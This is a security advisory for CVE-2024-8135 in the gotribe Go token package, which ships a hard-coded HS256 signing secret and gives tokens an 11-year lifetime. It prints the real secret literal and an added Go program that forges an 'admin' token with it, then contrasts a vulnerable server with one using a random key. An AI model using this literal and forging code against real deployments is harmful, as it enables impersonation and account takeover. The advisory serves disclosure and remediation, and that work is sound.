Use of Hard-coded Credentials Affecting github.com/go-tribe/gotribe/pkg/token package, versions *
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.25% (66th percentile)
- Snyk ID SNYK-GOLANG-GITHUBCOMGOTRIBEGOTRIBEPKGTOKEN-7830478
- published 25 Aug 2024
- disclosed 24 Aug 2024
- credit gtqbhksl
Introduced: 24 Aug 2024
- CVE-2024-8135
How to fix?
A fix was pushed into the master branch but not yet published.
Overview
Affected versions of this package are vulnerable to Use of Hard-coded Credentials in the token.go component. The HS256 signing secret (config.key) is a string literal in the package-level config, not a function argument, so it is identical in every build and readable by anyone with access to the source. An attacker who knows it can sign tokens carrying the same claims Sign produces, for any identity value they choose, and the application will accept them as genuine. Because Sign sets exp to 100000 hours after issue, a forged or leaked token remains valid for years.
PoC
package token

import (
	"sync"
	"time"
	jwt "github.com/golang-jwt/jwt/v4" // import path assumed; the excerpt omits it
)

// Config holds the HS256 signing secret and the claim name carrying the subject.
type Config struct {
	key         string
	identityKey string
}

var (
	// The signing secret is a string literal, so every build shares it and anyone
	// who reads the repository can sign tokens the application will trust.
	config = Config{"Rtg8BPKNEf2mB4mgvKONGPZZQSaJWNLijxR42qRgq0iBb5", "identityKey"}
	once   sync.Once
)

// ........... (remainder of the file elided in the advisory)

// Sign issues a token signed with jwtSecret; the token's claims carry the subject passed in.
func Sign(identityKey string) (tokenString string, err error) {
	// Token contents
	token := jwt.NewWithClaims(jwt.SigningMethodHS256, jwt.MapClaims{
		config.identityKey: identityKey,
		"nbf":             time.Now().Unix(),
		"iat":             time.Now().Unix(),
		"exp":             time.Now().Add(100000 * time.Hour).Unix(), // about 11 years
	})
	// Issue the token
	tokenString, err = token.SignedString([]byte(config.key))
	return
}
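The following is an added example, not code from the gotribe project or from the advisory. It shows why the literal in the PoC above is a credential: an attacker who has only the repository mints a token that a server verifying with the same literal accepts, while a server using a per-deployment random key rejects it. To keep it dependency-free it implements HS256 compact JWS with the standard library instead of the jwt module; the function names (IssueForIdentity, ForgeWithLeakedKey, VulnerableServerAccepts, HardenedServerAccepts, NewRandomKey) are hypothetical and chosen for this example.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
	"time"
)

// leakedKey is the literal from the advisory's PoC. Anyone who can read the
// public repository has it, so every deployment built from that source trusts
// tokens the reader can mint.
const leakedKey = "Rtg8BPKNEf2mB4mgvKONGPZZQSaJWNLijxR42qRgq0iBb5"

// signHS256 builds a compact JWS (header.payload.signature) over claims with
// HMAC-SHA256, the construction jwt.SigningMethodHS256 uses (stdlib only here).
func signHS256(claims map[string]any, key []byte) (string, error) {
	enc := base64.RawURLEncoding
	body, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	input := enc.EncodeToString([]byte(`{"alg":"HS256","typ":"JWT"}`)) + "." + enc.EncodeToString(body)
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(input))
	return input + "." + enc.EncodeToString(mac.Sum(nil)), nil
}

// verifyHS256 recomputes the MAC with key (the header's alg is ignored, so a
// token cannot downgrade the algorithm), compares in constant time via
// hmac.Equal, then enforces exp. Claims are returned only if both checks pass.
func verifyHS256(tok string, key []byte, now time.Time) (map[string]any, error) {
	parts := strings.Split(tok, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil {
		return nil, err
	}
	mac := hmac.New(sha256.New, key)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	if !hmac.Equal(mac.Sum(nil), sig) {
		return nil, errors.New("signature does not verify under this key")
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return nil, err
	}
	var claims map[string]any
	if err := json.Unmarshal(payload, &claims); err != nil {
		return nil, err
	}
	exp, ok := claims["exp"].(float64) // JSON numbers decode as float64
	if !ok || !now.Before(time.Unix(int64(exp), 0)) {
		return nil, errors.New("token expired or missing exp")
	}
	return claims, nil
}

// IssueForIdentity mirrors the claims Sign sets, but takes the key and lifetime
// from the caller instead of a source-code literal and a 100000-hour constant.
func IssueForIdentity(identity string, key []byte, ttl time.Duration) (string, error) {
	now := time.Now()
	return signHS256(map[string]any{
		"identityKey": identity,
		"nbf":         now.Unix(),
		"iat":         now.Unix(),
		"exp":         now.Add(ttl).Unix(),
	}, key)
}

// ForgeWithLeakedKey is the attack: no access to the server is needed, only the
// string from the repository, to mint a token for any identity.
func ForgeWithLeakedKey(identity string) (string, error) {
	return IssueForIdentity(identity, []byte(leakedKey), time.Hour)
}

// VulnerableServerAccepts models a server verifying with the same literal.
func VulnerableServerAccepts(tok string) bool {
	_, err := verifyHS256(tok, []byte(leakedKey), time.Now())
	return err == nil
}

// NewRandomKey is the fix: a per-deployment secret generated at install time
// or read from a secret store, never committed to source.
func NewRandomKey() ([]byte, error) {
	key := make([]byte, 32)
	if _, err := rand.Read(key); err != nil {
		return nil, err
	}
	return key, nil
}

// HardenedServerAccepts verifies against the deployment's own key, so the
// published literal is useless against it.
func HardenedServerAccepts(tok string, key []byte) bool {
	_, err := verifyHS256(tok, key, time.Now())
	return err == nil
}

func main() {
	forged, _ := ForgeWithLeakedKey("admin")
	fmt.Println("forged token:", forged)
	fmt.Println("vulnerable server accepts forgery:", VulnerableServerAccepts(forged))
	key, _ := NewRandomKey()
	fmt.Println("hardened server accepts forgery:", HardenedServerAccepts(forged, key))
}
```

Rotating the literal in a later release does not help on its own: the new value is again shared by every deployment and again readable in the repository. The key must come from outside the source tree, and the token lifetime should be short enough that a stolen token expires long before 100000 hours.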